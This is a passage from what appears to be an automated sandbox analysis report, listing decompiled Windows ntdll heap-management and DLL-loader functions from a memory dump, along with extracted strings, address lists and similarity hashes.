                                                                                      								if(_t187 == 0) {
                                                                                      									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                      									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                      									goto L17;
                                                                                      								}
                                                                                      								_t252 = _t187;
                                                                                      								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							while(1) {
                                                                                      								L17:
                                                                                      								_t212 = E017DAB40(_t206, _t252, 1, _t185, _t211);
                                                                                      								if(_t212 != 0) {
                                                                                      									_t146 = _t206 + 0xc0;
                                                                                      									break;
                                                                                      								}
                                                                                      								_t252 =  *_t252;
                                                                                      								_t211 = _v20;
                                                                                      								_t185 =  *(_t252 + 0x14);
                                                                                      							}
                                                                                      							L19:
                                                                                      							if(_t146 != _t212) {
                                                                                      								_t237 =  *(_t206 + 0x4c);
                                                                                      								_t253 = _v20;
                                                                                      								while(1) {
                                                                                      									__eflags = _t237;
                                                                                      									if(_t237 == 0) {
                                                                                      										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                                      									} else {
                                                                                      										_t184 =  *(_t212 - 8);
                                                                                      										_t237 =  *(_t206 + 0x4c);
                                                                                      										__eflags = _t184 & _t237;
                                                                                      										if((_t184 & _t237) != 0) {
                                                                                      											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                                      											__eflags = _t184;
                                                                                      										}
                                                                                      										_t147 = _t184 & 0x0000ffff;
                                                                                      									}
                                                                                      									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                                      									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                                      										goto L20;
                                                                                      									}
                                                                                      									_t212 =  *_t212;
                                                                                      									__eflags = _t206 + 0xc0 - _t212;
                                                                                      									if(_t206 + 0xc0 != _t212) {
                                                                                      										continue;
                                                                                      									} else {
                                                                                      										goto L20;
                                                                                      									}
                                                                                      									goto L56;
                                                                                      								}
                                                                                      							}
                                                                                      							L20:
                                                                                      							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                                      							_t33 = _t256 + 8; // -16
                                                                                      							_t238 = _t33;
                                                                                      							_t254 =  *_t149;
                                                                                      							if( *_t149 != _t212) {
                                                                                      								_push(_t212);
                                                                                      								E0187A80D(0, _t212, 0, _t254);
                                                                                      							} else {
                                                                                      								 *_t238 = _t212;
                                                                                      								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                                      								 *_t149 = _t238;
                                                                                      								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                                      							}
                                                                                      							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                                      							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                      							if(_t255 == 0) {
                                                                                      								L36:
                                                                                      								if( *(_t206 + 0x4c) != 0) {
                                                                                      									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                                      									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                                      								}
                                                                                      								_t210 = _v48;
                                                                                      								_t251 = _v12 & 0x0000ffff;
                                                                                      								_t131 = _v20;
                                                                                      								_t235 = _v24 - _t131;
                                                                                      								_v24 = _t235;
                                                                                      								_t256 = _t256 + _t131 * 8;
                                                                                      								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                                      									goto L41;
                                                                                      								} else {
                                                                                      									goto L39;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t216 =  *_t256 & 0x0000ffff;
                                                                                      								_v28 = _t216;
                                                                                      								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                                      									L28:
                                                                                      									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                                      									_v32 = _t242;
                                                                                      									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                                      										_t167 = _t242 + _t242;
                                                                                      									} else {
                                                                                      										_t167 = _t242;
                                                                                      									}
                                                                                      									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                                      									_t168 = _t167 << 2;
                                                                                      									_v40 = _t168;
                                                                                      									_t206 = _v44;
                                                                                      									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                                      									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                                      										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                                      									}
                                                                                      									_t217 = _v16;
                                                                                      									if(_t217 != 0) {
                                                                                      										_t173 = _t217 - 8;
                                                                                      										_v52 = _t173;
                                                                                      										_t174 =  *_t173;
                                                                                      										__eflags =  *(_t206 + 0x4c);
                                                                                      										if( *(_t206 + 0x4c) != 0) {
                                                                                      											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                                      											_v36 = _t245;
                                                                                      											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                                      											__eflags = _t245 >> 0x18 - _t225;
                                                                                      											if(_t245 >> 0x18 != _t225) {
                                                                                      												_push(_t225);
                                                                                      												E0187A80D(_t206, _v52, 0, 0);
                                                                                      											}
                                                                                      											_t174 = _v36;
                                                                                      											_t217 = _v16;
                                                                                      											_t242 = _v32;
                                                                                      										}
                                                                                      										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                                      										__eflags = _v28;
                                                                                      										if(_v28 > 0) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											goto L33;
                                                                                      										}
                                                                                      									} else {
                                                                                      										L33:
                                                                                      										_t58 = _t256 + 8; // -16
                                                                                      										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                                      										_t206 = _v44;
                                                                                      										_t217 = _v16;
                                                                                      										L34:
                                                                                      										if(_t217 == 0) {
                                                                                      											asm("bts eax, edx");
                                                                                      										}
                                                                                      										goto L36;
                                                                                      									}
                                                                                      								} else {
                                                                                      									goto L24;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L24:
                                                                                      									_t182 =  *_t255;
                                                                                      									if(_t182 == 0) {
                                                                                      										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                                      										__eflags = _t216;
                                                                                      										goto L28;
                                                                                      									}
                                                                                      									_t255 = _t182;
                                                                                      									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                                      										continue;
                                                                                      									} else {
                                                                                      										goto L28;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L28;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L39:
                                                                                      				} while (_t235 != 0);
                                                                                      				_t214 = _v12;
                                                                                      				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                                      				 *(_t256 + 4) = _t131;
                                                                                      				if(_t214 == 0) {
                                                                                      					__eflags =  *0x18a8748 - 1;
                                                                                      					if( *0x18a8748 >= 1) {
                                                                                      						_t127 = _t256 + 0xfff; // 0xfff
                                                                                      						_t131 = _t127 & 0xfffff000;
                                                                                      						__eflags = _t131 - _t256;
                                                                                      						if(_t131 != _t256) {
                                                                                      							_t156 =  *[fs:0x30];
                                                                                      							__eflags =  *(_t156 + 0xc);
                                                                                      							if( *(_t156 + 0xc) == 0) {
                                                                                      								_push("HEAP: ");
                                                                                      								E017BB150();
                                                                                      							} else {
                                                                                      								E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      							}
                                                                                      							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                                      							_t131 = E017BB150();
                                                                                      							__eflags =  *0x18a7bc8;
                                                                                      							if(__eflags == 0) {
                                                                                      								_t131 = E01872073(_t206, 1, _t251, __eflags);
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				goto L41;
                                                                                      			}
                                                                                      0x017daad9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01822361
                                                                                      0x01822369
                                                                                      0x0182236b
                                                                                      0x00000000
                                                                                      0x01822371
                                                                                      0x00000000
                                                                                      0x01822371
                                                                                      0x00000000
                                                                                      0x0182236b
                                                                                      0x017daac0
                                                                                      0x017da94a
                                                                                      0x017da94a
                                                                                      0x017da94d
                                                                                      0x017da94d
                                                                                      0x017da950
                                                                                      0x017da954
                                                                                      0x01822376
                                                                                      0x01822380
                                                                                      0x017da95a
                                                                                      0x017da95a
                                                                                      0x017da95c
                                                                                      0x017da95f
                                                                                      0x017da961
                                                                                      0x017da961
                                                                                      0x017da967
                                                                                      0x017da96a
                                                                                      0x017da972
                                                                                      0x017daa02
                                                                                      0x017daa06
                                                                                      0x017daa10
                                                                                      0x017daa16
                                                                                      0x017daa16
                                                                                      0x017daa1b
                                                                                      0x017daa21
                                                                                      0x017daa24
                                                                                      0x017daa27
                                                                                      0x017daa29
                                                                                      0x017daa2c
                                                                                      0x017daa32
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017da978
                                                                                      0x017da978
                                                                                      0x017da97b
                                                                                      0x017da981
                                                                                      0x017da996
                                                                                      0x017da998
                                                                                      0x017da99f
                                                                                      0x017da9a2
                                                                                      0x0182238a
                                                                                      0x017da9a8
                                                                                      0x017da9a8
                                                                                      0x017da9a8
                                                                                      0x017da9aa
                                                                                      0x017da9ad
                                                                                      0x017da9b0
                                                                                      0x017da9bb
                                                                                      0x017da9be
                                                                                      0x017da9c7
                                                                                      0x017da9c9
                                                                                      0x017da9c9
                                                                                      0x017da9cc
                                                                                      0x017da9d1
                                                                                      0x017daa6d
                                                                                      0x017daa70
                                                                                      0x017daa73
                                                                                      0x017daa75
                                                                                      0x017daa79
                                                                                      0x017daa7e
                                                                                      0x017daa82
                                                                                      0x017daa8f
                                                                                      0x017daa94
                                                                                      0x017daa96
                                                                                      0x01822392
                                                                                      0x018223a1
                                                                                      0x018223a1
                                                                                      0x017daa9c
                                                                                      0x017daa9f
                                                                                      0x017daaa2
                                                                                      0x017daaa2
                                                                                      0x017daaa8
                                                                                      0x017daaab
                                                                                      0x017daaaf
                                                                                      0x00000000
                                                                                      0x017daab5
                                                                                      0x00000000
                                                                                      0x017daab5
                                                                                      0x017da9d7
                                                                                      0x017da9d7
                                                                                      0x017da9da
                                                                                      0x017da9e0
                                                                                      0x017da9e3
                                                                                      0x017da9e6
                                                                                      0x017da9e9
                                                                                      0x017da9eb
                                                                                      0x017da9fd
                                                                                      0x017da9fd
                                                                                      0x00000000
                                                                                      0x017da9eb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017da983
                                                                                      0x017da983
                                                                                      0x017da983
                                                                                      0x017da987
                                                                                      0x017da995
                                                                                      0x017da995
                                                                                      0x017da995
                                                                                      0x017da995
                                                                                      0x017da989
                                                                                      0x017da98e
                                                                                      0x00000000
                                                                                      0x017da990
                                                                                      0x00000000
                                                                                      0x017da990
                                                                                      0x017da98e
                                                                                      0x00000000
                                                                                      0x017da983
                                                                                      0x017da972
                                                                                      0x017da90a
                                                                                      0x017daa34
                                                                                      0x017daa34
                                                                                      0x017daa40
                                                                                      0x017daa43
                                                                                      0x017daa46
                                                                                      0x017daa4d
                                                                                      0x018223ab
                                                                                      0x018223b2
                                                                                      0x018223b8
                                                                                      0x018223be
                                                                                      0x018223c3
                                                                                      0x018223c5
                                                                                      0x018223cb
                                                                                      0x018223d1
                                                                                      0x018223d5
                                                                                      0x018223f6
                                                                                      0x018223fb
                                                                                      0x018223d7
                                                                                      0x018223ec
                                                                                      0x018223f1
                                                                                      0x01822403
                                                                                      0x01822408
                                                                                      0x01822410
                                                                                      0x01822417
                                                                                      0x01822422
                                                                                      0x01822422
                                                                                      0x01822417
                                                                                      0x018223c5
                                                                                      0x018223b2
                                                                                      0x00000000

                                                                                      Strings
                                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01822403
                                                                                      • HEAP: , xrefs: 018222E6, 018223F6
                                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018222F3
                                                                                      • HEAP[%wZ]: , xrefs: 018222D7, 018223E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                      • API String ID: 0-1657114761
                                                                                      • Opcode ID: eed070ce38098089d384c58398029284dcd664fce761829e7491200c1a0e792d
                                                                                      • Instruction ID: abb3b3c7f7880c254499f86f13d84635aa039bf02aded3a1dfbc71d18ed56744
                                                                                      • Opcode Fuzzy Hash: eed070ce38098089d384c58398029284dcd664fce761829e7491200c1a0e792d
                                                                                      • Instruction Fuzzy Hash: 2BD1B074A0024A8FDB19CF68C494BBAFBF2FF88300F158569D9569B346E334EA45CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E017DA229(void* __ecx, void* __edx) {
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				char _v28;
                                                                                      				void* _v44;
                                                                                      				void* _v48;
                                                                                      				void* _v56;
                                                                                      				void* _v60;
                                                                                      				void* __ebx;
                                                                                      				signed int _t55;
                                                                                      				signed int _t57;
                                                                                      				void* _t61;
                                                                                      				intOrPtr _t62;
                                                                                      				void* _t65;
                                                                                      				void* _t71;
                                                                                      				signed char* _t74;
                                                                                      				intOrPtr _t75;
                                                                                      				signed char* _t80;
                                                                                      				intOrPtr _t81;
                                                                                      				void* _t82;
                                                                                      				signed char* _t85;
                                                                                      				signed char _t91;
                                                                                      				void* _t103;
                                                                                      				void* _t105;
                                                                                      				void* _t121;
                                                                                      				void* _t129;
                                                                                      				signed int _t131;
                                                                                      				void* _t133;
                                                                                      
                                                                                      				_t105 = __ecx;
                                                                                      				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                                      				_t103 = __edx;
                                                                                      				_t129 = __ecx;
                                                                                      				E017DDF24(__edx,  &_v28, _t133);
                                                                                      				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                                      				asm("sbb edi, edi");
                                                                                      				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                                      				if(_t55 != 0) {
                                                                                      					_push(0);
                                                                                      					_push(0x14);
                                                                                      					_push( &_v24);
                                                                                      					_push(3);
                                                                                      					_push(_t129);
                                                                                      					_push(0xffffffff);
                                                                                      					_t57 = E017F9730();
                                                                                      					__eflags = _t57;
                                                                                      					if(_t57 < 0) {
                                                                                      						L17:
                                                                                      						_push(_t105);
                                                                                      						E0187A80D(_t129, 1, _v20, 0);
                                                                                      						_t121 = 4;
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					__eflags = _v20 & 0x00000060;
                                                                                      					if((_v20 & 0x00000060) == 0) {
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					__eflags = _v24 - _t129;
                                                                                      					if(_v24 == _t129) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L17;
                                                                                      				}
                                                                                      				L1:
                                                                                      				_push(_t121);
                                                                                      				_push(0x1000);
                                                                                      				_push(_t133 + 0x14);
                                                                                      				_push(0);
                                                                                      				_push(_t133 + 0x20);
                                                                                      				_push(0xffffffff);
                                                                                      				_t61 = E017F9660();
                                                                                      				_t122 = _t61;
                                                                                      				if(_t61 < 0) {
                                                                                      					_t62 =  *[fs:0x30];
                                                                                      					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                                      					__eflags =  *(_t62 + 0xc);
                                                                                      					if( *(_t62 + 0xc) == 0) {
                                                                                      						_push("HEAP: ");
                                                                                      						E017BB150();
                                                                                      					} else {
                                                                                      						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                      					}
                                                                                      					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                                      					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                                      					_push(_t129);
                                                                                      					E017BB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                                      					_t65 = 0;
                                                                                      					L13:
                                                                                      					return _t65;
                                                                                      				}
                                                                                      				_t71 = E017D7D50();
                                                                                      				_t124 = 0x7ffe0380;
                                                                                      				if(_t71 != 0) {
                                                                                      					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                      				} else {
                                                                                      					_t74 = 0x7ffe0380;
                                                                                      				}
                                                                                      				if( *_t74 != 0) {
                                                                                      					_t75 =  *[fs:0x30];
                                                                                      					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                                      					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                                      						E0187138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                                      					}
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                                      				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                                      				if(E017D7D50() != 0) {
                                                                                      					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                      				} else {
                                                                                      					_t80 = _t124;
                                                                                      				}
                                                                                      				if( *_t80 != 0) {
                                                                                      					_t81 =  *[fs:0x30];
                                                                                      					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                                      					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                                      						__eflags = E017D7D50();
                                                                                      						if(__eflags != 0) {
                                                                                      							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                      							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                      						}
                                                                                      						E01871582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                                      					}
                                                                                      				}
                                                                                      				_t82 = E017D7D50();
                                                                                      				_t125 = 0x7ffe038a;
                                                                                      				if(_t82 != 0) {
                                                                                      					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                      				} else {
                                                                                      					_t85 = 0x7ffe038a;
                                                                                      				}
                                                                                      				if( *_t85 != 0) {
                                                                                      					__eflags = E017D7D50();
                                                                                      					if(__eflags != 0) {
                                                                                      						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                      						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                      					}
                                                                                      					E01871582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                                      				_t91 =  *(_t103 + 2);
                                                                                      				if((_t91 & 0x00000004) != 0) {
                                                                                      					E0180D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                                      					_t91 =  *(_t103 + 2);
                                                                                      				}
                                                                                      				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                                      				_t65 = 1;
                                                                                      				goto L13;
                                                                                      			}

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 2994545307-2586055223
                                                                                      • Opcode ID: e707546a2e0ea5dae0dbe37fa525864fc5e1966dab89cb175e6723ca10a9b30b
                                                                                      • Instruction ID: a0a5751ca244923b2e40da485009b28f3e6bb7fbb0d110c34dd23a44b07708e8
                                                                                      • Opcode Fuzzy Hash: e707546a2e0ea5dae0dbe37fa525864fc5e1966dab89cb175e6723ca10a9b30b
                                                                                      • Instruction Fuzzy Hash: D45117722056959FE722DB69C848F67BBF8FF80B50F180568F951CB291D734EA40CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 44%
                                                                                      			E017E8E00(void* __ecx) {
                                                                                      				signed int _v8;
                                                                                      				char _v12;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t32;
                                                                                      				intOrPtr _t35;
                                                                                      				intOrPtr _t43;
                                                                                      				void* _t46;
                                                                                      				intOrPtr _t47;
                                                                                      				void* _t48;
                                                                                      				signed int _t49;
                                                                                      				void* _t50;
                                                                                      				intOrPtr* _t51;
                                                                                      				signed int _t52;
                                                                                      				void* _t53;
                                                                                      				intOrPtr _t55;
                                                                                      
                                                                                      				_v8 =  *0x18ad360 ^ _t52;
                                                                                      				_t49 = 0;
                                                                                      				_t48 = __ecx;
                                                                                      				_t55 =  *0x18a8464; // 0x73b80110
                                                                                      				if(_t55 == 0) {
                                                                                      					L9:
                                                                                      					if( !_t49 >= 0) {
                                                                                      						if(( *0x18a5780 & 0x00000003) != 0) {
                                                                                      							E01835510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                      						}
                                                                                      						if(( *0x18a5780 & 0x00000010) != 0) {
                                                                                      							asm("int3");
                                                                                      						}
                                                                                      					}
                                                                                      					return E017FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                      				}
                                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                      				_t43 =  *0x18a7984; // 0x1352b78
                                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                      					if(_t48 == _t43) {
                                                                                      						_t50 = 0x5c;
                                                                                      						if( *_t32 == _t50) {
                                                                                      							_t46 = 0x3f;
                                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                      								_t32 = _t32 + 8;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_t51 =  *0x18a8464; // 0x73b80110
                                                                                      					 *0x18ab1e0(_t47, _t32,  &_v12);
                                                                                      					_t49 =  *_t51();
                                                                                      					if(_t49 >= 0) {
                                                                                      						L8:
                                                                                      						_t35 = _v12;
                                                                                      						if(_t35 != 0) {
                                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                      								E017E9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                      								_t35 = _v12;
                                                                                      							}
                                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                      						}
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					if(_t49 != 0xc000008a) {
                                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                      							if(_t49 != 0xc00000bb) {
                                                                                      								goto L8;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					if(( *0x18a5780 & 0x00000005) != 0) {
                                                                                      						_push(_t49);
                                                                                      						E01835510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                      						_t53 = _t53 + 0x1c;
                                                                                      					}
                                                                                      					_t49 = 0;
                                                                                      					goto L8;
                                                                                      				} else {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      			}

                                                                                      Strings
                                                                                      • LdrpFindDllActivationContext, xrefs: 01829331, 0182935D
                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0182932A
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01829357
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0182933B, 01829367
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 0-3779518884
                                                                                      • Opcode ID: e8041d7f6fb7c47b6d08be67815357a7db979e640b9525495037dcc74874a353
                                                                                      • Instruction ID: 8a88308293e43c90485e707d23eac6b60c357a458d3932b0e9d47671b49d94ad
                                                                                      • Opcode Fuzzy Hash: e8041d7f6fb7c47b6d08be67815357a7db979e640b9525495037dcc74874a353
                                                                                      • Instruction Fuzzy Hash: 03410772A003259FEF36AA5C888CA76F7F5AB0D358F49416AE90497151E7706EC087C3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                      • API String ID: 2994545307-336120773
                                                                                      • Opcode ID: 76e75d640870d6ed31b2a611d545c32d2979da08c8893763b6a663a303e2a322
                                                                                      • Instruction ID: 757e79d02b6a5f3cd989fc7b6e67419f1fdc347a1593177a92d1bdb951ef38a5
                                                                                      • Opcode Fuzzy Hash: 76e75d640870d6ed31b2a611d545c32d2979da08c8893763b6a663a303e2a322
                                                                                      • Instruction Fuzzy Hash: 9E312131200159EFD721EB9DC8CAFABF7A8EF00724F14415AF905CB251E674EA44CB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E017C8794(void* __ecx) {
                                                                                      				signed int _v0;
                                                                                      				char _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				signed int _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v40;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr* _t77;
                                                                                      				signed int _t80;
                                                                                      				signed char _t81;
                                                                                      				signed int _t87;
                                                                                      				signed int _t91;
                                                                                      				void* _t92;
                                                                                      				void* _t94;
                                                                                      				signed int _t95;
                                                                                      				signed int _t103;
                                                                                      				signed int _t105;
                                                                                      				signed int _t110;
                                                                                      				signed int _t118;
                                                                                      				intOrPtr* _t121;
                                                                                      				intOrPtr _t122;
                                                                                      				signed int _t125;
                                                                                      				signed int _t129;
                                                                                      				signed int _t131;
                                                                                      				signed int _t134;
                                                                                      				signed int _t136;
                                                                                      				signed int _t143;
                                                                                      				signed int* _t147;
                                                                                      				signed int _t151;
                                                                                      				void* _t153;
                                                                                      				signed int* _t157;
                                                                                      				signed int _t159;
                                                                                      				signed int _t161;
                                                                                      				signed int _t166;
                                                                                      				signed int _t168;
                                                                                      
                                                                                      				_push(__ecx);
                                                                                      				_t153 = __ecx;
                                                                                      				_t159 = 0;
                                                                                      				_t121 = __ecx + 0x3c;
                                                                                      				if( *_t121 == 0) {
                                                                                      					L2:
                                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                      							L6:
                                                                                      							if(E017C934A() != 0) {
                                                                                      								_t159 = E0183A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                      								__eflags = _t159;
                                                                                      								if(_t159 < 0) {
                                                                                      									_t81 =  *0x18a5780; // 0x0
                                                                                      									__eflags = _t81 & 0x00000003;
                                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                                      										_push(_t159);
